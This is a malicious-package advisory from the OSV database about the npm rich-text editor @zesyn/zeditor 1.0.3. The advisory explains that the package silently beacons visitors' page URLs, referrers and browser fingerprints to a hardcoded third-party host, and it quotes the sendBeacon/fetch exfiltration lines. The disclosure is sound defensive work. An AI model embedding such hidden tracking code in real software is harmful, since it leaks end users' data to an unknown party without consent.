@zesyn/zeditor @1.0.3
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4471
Ecosystem
npm
Summary
The package advertises itself as a browser rich-text editor, but on every new Zeditor(...) instantiation it waits 2 seconds and then POSTs end-user telemetry to a hardcoded URL https://yourdomain.com/zeditor-api/track.php (via navigator.sendBeacon with a fetch POST fallback). The exfiltrated payload includes page URL (up to 500 chars), referrer, hostname, browser language, screen size, timezone, full user-agent, and install method. The destination is the unconfigured placeholder string yourdomain.com — a real third-party domain not owned by the package's publisher ( zesyn.com ). Any application that embeds this editor in production silently ships every visitor's browsing context and fingerprint to whoever currently controls yourdomain.com . Code locations: dist/zeditor.es.js defines const T = "https://yourdomain.com/zeditor-api/track.php" and calls navigator.sendBeacon(T, l) / fetch(T, { method: "POST", body: JSON.stringify(a) }) from init() via setTimeout(() => Y(), 2e3) ; equivalent code is present in the IIFE and UMD bundles.
Source: amazon-inspector (7c8e293ad2413e2e04b9ce3411d1650381143b104c40bbcb4a17c1140c9ef912)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.